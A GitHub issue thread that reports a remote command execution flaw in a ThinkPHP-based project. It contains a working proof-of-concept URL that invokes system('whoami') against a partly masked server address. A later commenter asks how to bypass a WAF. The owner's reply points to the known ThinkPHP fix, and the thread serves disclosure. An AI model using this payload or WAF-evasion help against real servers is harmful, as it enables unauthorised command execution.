This repository has been archived by the owner on Nov 12, 2022. It is now read-only.

There is A RCE vulnerability in your system. #33

Open

CCkiller opened this issue Jan 12, 2019 · 2 comments

CCkiller commented Jan 12, 2019

The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command "whoami".
poc:
http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

Owner

xyl-tools commented Jan 14, 2019

This is the official vulnerability of ThinkPHP, please upgrade the core framework to the latest version of the official.

velocity16902 commented Jun 2, 2020

hi,
Is there a way to bypass the waf? I get a 403 forbidden error.

allenwest24 mentioned this issue

Added CVE-2016-5639.yaml and CVE-2019-9082.yaml projectdiscovery/nuclei-templates#5710

Closed

2 tasks

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.